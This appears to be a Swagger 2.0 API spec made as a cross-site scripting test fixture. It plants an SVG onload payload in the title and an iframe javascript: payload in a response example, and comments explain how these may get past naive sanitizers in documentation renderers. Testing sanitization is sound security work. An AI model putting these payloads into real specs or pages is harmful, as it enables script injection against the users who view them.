swagger: '2.0'
info: 
  # Titles are often rendered directly inside <h1> or <a> tags.
  # Let's try an SVG payload, as they sometimes bypass naive sanitizers.
  title: Test Title <svg/onload=alert('XSS-in-Title')>
  description: A safe description.
  version: production
basePath: /
paths:
  '/test':
    get:
      summary: A test endpoint
      responses:
        '200':
          description: OK
          schema:
            type: object
            properties:
              id:
                type: string
                # Example values are another common place for XSS.
                # When you click "Execute", the response body is often
                # rendered. If the example is used, it might not be sanitized.
                example: '"><iframe src="javascript:alert(`XSS-in-Example`)"></iframe>'
